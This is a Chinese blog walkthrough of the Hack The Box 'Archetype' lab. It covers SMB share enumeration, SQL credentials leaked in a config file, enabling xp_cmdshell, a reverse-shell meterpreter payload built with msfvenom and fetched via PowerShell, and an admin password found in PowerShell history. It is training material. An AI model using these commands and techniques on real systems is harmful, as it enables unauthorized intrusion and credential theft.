HTB-Archetype

2025-02-01 132 0

靶机IP:10.129.166.143

kali IP:10.10.16.39

使用nmap进行端口扫描并保存到ports文件中

nmap -sT --min-rate 10000 -p- 10.129.166.143 -oA ports

但由于网络不稳定,一直没有扫出结果,看writeup已知开放135,139,445,1433

继续扫描服务版本等详细信息

nmap -sT -sC -sV -O -p135,139,445,1433 10.129.166.143

依然扫不出来,但也无所谓了

先从smb下手 smbclient -L 10.129.166.143 会报连接失败的问题,可能也是网络环境的原因

没有密码直接回车即可,$结尾需要管理员权限,所以只能查看backups

使用反斜杠再转义并不是标准的写法,但能好使

HTB-Archetype插图

HTB-Archetype插图1

# cat prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

查看得到的文件,获得User ID=ARCHETYPE\sql_svc,Password=M3g4c0rp123,使用此用户名和密码登录
mssql,先定位一下mssqlclient的位置

# locate mssqlclient.py
/usr/share/doc/python3-impacket/examples/mssqlclient.py
# python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sql_svc@10.129.166.143 -windows-auth
// -windows-auth表示使用windows身份认证,主要是我不加就登不上去

SQL Server中的xp_cmdshell是一个扩展存储过程,它允许执行操作系统命令,我们可以借助它来上传一个
反弹shell,但它默认是禁用的,需要将它启用

SQL (ARCHETYPE\sql_svc  dbo@master)> enable_xp_cmdshell
INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc  dbo@master)> reconfigure

使用msfvenom生成payload

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.39 LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

打开msf,设置监听器并修改对应的选项

HTB-Archetype插图2

先用php架起一个服务器

php -S 0:80

使用powershell下载生成好的payload并保存在当前用户的目录下

然后将msf监听器启动,并执行payload
HTB-Archetype插图3

HTB-Archetype插图4

确认是我们靶机的IP,已经获得了初始立足点

HTB-Archetype插图5

获得user flag

HTB-Archetype插图6

查看powershell历史记录

PowerShell 的历史记录通常保存在一个文本文件中,默认路径如下:
Windows 10/11:%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Windows Server:%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

c:\Users\sql_svc\Desktop>type c:\users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type c:\users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

命令是在 Windows 系统中通过 net use 命令将网络共享驱动器映射到本地系统的一个命令行。该命令会将远程服务器 \Archetype\backups 共享资源映射为本地的 T: 驱动器,并使用指定的用户名和密码进行身份验证。由此获得了administrator的密码为MEGACORP_4dm1n!!

使用psexec登录,evil-winrm应该也可以
确认IP没问题,已经是system了

HTB-Archetype插图7

拿到root flag
HTB-Archetype插图8

使用evil-winrm

HTB-Archetype插图9

一样拿到root flag
HTB-Archetype插图10


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

恶意软件伪装成合法 Go 库感染Linux和macOS用户 | CSO Online
PWN栈溢出基础-ret2csu
【验证码逆向专栏】某盾 v2 滑动验证码逆向分析
探秘条件漏洞:系统安全的潜在隐患
记录某SRC邀请处逻辑越权到组织管理员漏洞
DNSTwist 使用指南

发布评论